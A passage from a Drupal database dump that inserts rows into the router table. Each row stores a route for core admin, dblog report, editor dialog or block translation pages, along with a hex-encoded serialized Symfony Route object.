('contextual.render', '/contextual/render', '/contextual/render', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31383a222f636f6e7465787475616c2f72656e646572223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a225c44727570616c5c636f6e7465787475616c5c436f6e7465787475616c436f6e74726f6c6c65723a3a72656e646572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a2261636365737320636f6e7465787475616c206c696e6b73223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32353a227b5e2f636f6e7465787475616c2f72656e646572247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f636f6e7465787475616c2f72656e646572223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31383a222f636f6e7465787475616c2f72656e646572223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('dblog.access_denied', '/admin/reports/access-denied', '/admin/reports/access-denied', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f61646d696e2f7265706f7274732f6163636573732d64656e696564223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a363a225f7469746c65223b733a32363a22546f7020276163636573732064656e69656427206572726f7273223b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c64626c6f675c436f6e74726f6c6c65725c44624c6f67436f6e74726f6c6c65723a3a746f704c6f674d65737361676573223b733a343a2274797065223b733a31333a226163636573732064656e696564223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f7265706f7274732f6163636573735c2d64656e696564247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7265706f7274732f6163636573732d64656e696564223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f7265706f7274732f6163636573732d64656e696564223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('dblog.confirm', '/admin/reports/dblog/confirm', '/admin/reports/dblog/confirm', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f61646d696e2f7265706f7274732f64626c6f672f636f6e6669726d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34333a225c44727570616c5c64626c6f675c466f726d5c44626c6f67436c6561724c6f67436f6e6669726d466f726d223b733a363a225f7469746c65223b733a33343a22436f6e6669726d2064656c65746520726563656e74206c6f67206d65737361676573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33353a227b5e2f61646d696e2f7265706f7274732f64626c6f672f636f6e6669726d247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7265706f7274732f64626c6f672f636f6e6669726d223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f7265706f7274732f64626c6f672f636f6e6669726d223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('dblog.event', '/admin/reports/dblog/event/{event_id}', '/admin/reports/dblog/event/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f7265706f7274732f64626c6f672f6576656e742f7b6576656e745f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c64626c6f675c436f6e74726f6c6c65725c44624c6f67436f6e74726f6c6c65723a3a6576656e7444657461696c73223b733a363a225f7469746c65223b733a373a2244657461696c73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226576656e745f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35343a227b5e2f61646d696e2f7265706f7274732f64626c6f672f6576656e742f283f503c6576656e745f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226576656e745f6964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7265706f7274732f64626c6f672f6576656e74223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226576656e745f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f7265706f7274732f64626c6f672f6576656e742f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('dblog.overview', '/admin/reports/dblog', '/admin/reports/dblog', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f7265706f7274732f64626c6f67223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a383a227761746368646f67223b733a31303a22646973706c61795f6964223b733a343a2270616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f7265706f7274732f64626c6f67247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f7265706f7274732f64626c6f67223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f7265706f7274732f64626c6f67223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('dblog.page_not_found', '/admin/reports/page-not-found', '/admin/reports/page-not-found', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f61646d696e2f7265706f7274732f706167652d6e6f742d666f756e64223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a363a225f7469746c65223b733a32373a22546f70202770616765206e6f7420666f756e6427206572726f7273223b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c64626c6f675c436f6e74726f6c6c65725c44624c6f67436f6e74726f6c6c65723a3a746f704c6f674d65737361676573223b733a343a2274797065223b733a31343a2270616765206e6f7420666f756e64223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f7265706f7274732f706167655c2d6e6f745c2d666f756e64247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7265706f7274732f706167652d6e6f742d666f756e64223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32393a222f61646d696e2f7265706f7274732f706167652d6e6f742d666f756e64223b733a383a226e756d5061727473223b693a333b7d7d, 3);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('dblog.search', '/admin/reports/search', '/admin/reports/search', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f61646d696e2f7265706f7274732f736561726368223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c64626c6f675c436f6e74726f6c6c65725c44624c6f67436f6e74726f6c6c65723a3a746f704c6f674d65737361676573223b733a363a225f7469746c65223b733a31383a22546f70207365617263682070687261736573223b733a343a2274797065223b733a363a22736561726368223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a32303a225f6d6f64756c655f646570656e64656e63696573223b733a363a22736561726368223b733a31313a225f7065726d697373696f6e223b733a31393a226163636573732073697465207265706f727473223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32383a227b5e2f61646d696e2f7265706f7274732f736561726368247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32313a222f61646d696e2f7265706f7274732f736561726368223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32313a222f61646d696e2f7265706f7274732f736561726368223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('editor.filter_xss', '/editor/filter_xss/{filter_format}', '/editor/filter_xss/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33343a222f656469746f722f66696c7465725f7873732f7b66696c7465725f666f726d61747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a34323a225c44727570616c5c656469746f725c456469746f72436f6e74726f6c6c65723a3a66696c746572587373223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31373a2266696c7465725f666f726d61742e757365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35313a227b5e2f656469746f722f66696c7465725f7873732f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f656469746f722f66696c7465725f787373223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a32303a222f656469746f722f66696c7465725f7873732f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('editor.image_dialog', '/editor/dialog/image/{editor}', '/editor/dialog/image/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f656469746f722f6469616c6f672f696d6167652f7b656469746f727d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33373a225c44727570616c5c656469746f725c466f726d5c456469746f72496d6167654469616c6f67223b733a363a225f7469746c65223b733a31323a2255706c6f616420696d616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31303a22656469746f722e757365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a363a22656469746f72223b613a323a7b733a343a2274797065223b733a31333a22656e746974793a656469746f72223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34363a227b5e2f656469746f722f6469616c6f672f696d6167652f283f503c656469746f723e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22656469746f72223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f656469746f722f6469616c6f672f696d616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32323a222f656469746f722f6469616c6f672f696d6167652f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('editor.link_dialog', '/editor/dialog/link/{editor}', '/editor/dialog/link/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f656469746f722f6469616c6f672f6c696e6b2f7b656469746f727d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33363a225c44727570616c5c656469746f725c466f726d5c456469746f724c696e6b4469616c6f67223b733a363a225f7469746c65223b733a383a22416464206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31303a22656469746f722e757365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a363a22656469746f72223b613a323a7b733a343a2274797065223b733a31333a22656e746974793a656469746f72223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34353a227b5e2f656469746f722f6469616c6f672f6c696e6b2f283f503c656469746f723e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22656469746f72223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31393a222f656469746f722f6469616c6f672f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32313a222f656469746f722f6469616c6f672f6c696e6b2f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('editor.media_dialog', '/editor/dialog/media/{editor}', '/editor/dialog/media/%', 14, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32393a222f656469746f722f6469616c6f672f6d656469612f7b656469746f727d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33363a225c44727570616c5c6d656469615c466f726d5c456469746f724d656469614469616c6f67223b733a363a225f7469746c65223b733a31303a2245646974206d65646961223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31303a22656469746f722e757365223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a363a22656469746f72223b613a323a7b733a343a2274797065223b733a31333a22656e746974793a656469746f72223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a313a7b693a303b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34363a227b5e2f656469746f722f6469616c6f672f6d656469612f283f503c656469746f723e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22656469746f72223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f656469746f722f6469616c6f672f6d65646961223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a363a22656469746f72223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31343b733a31343a227061747465726e4f75746c696e65223b733a32323a222f656469746f722f6469616c6f672f6d656469612f25223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.block.config_translation_overview', '/admin/structure/block/manage/{block}/translate', '/admin/structure/block/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34373a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a353a22626c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36343a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a22626c6f636b223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
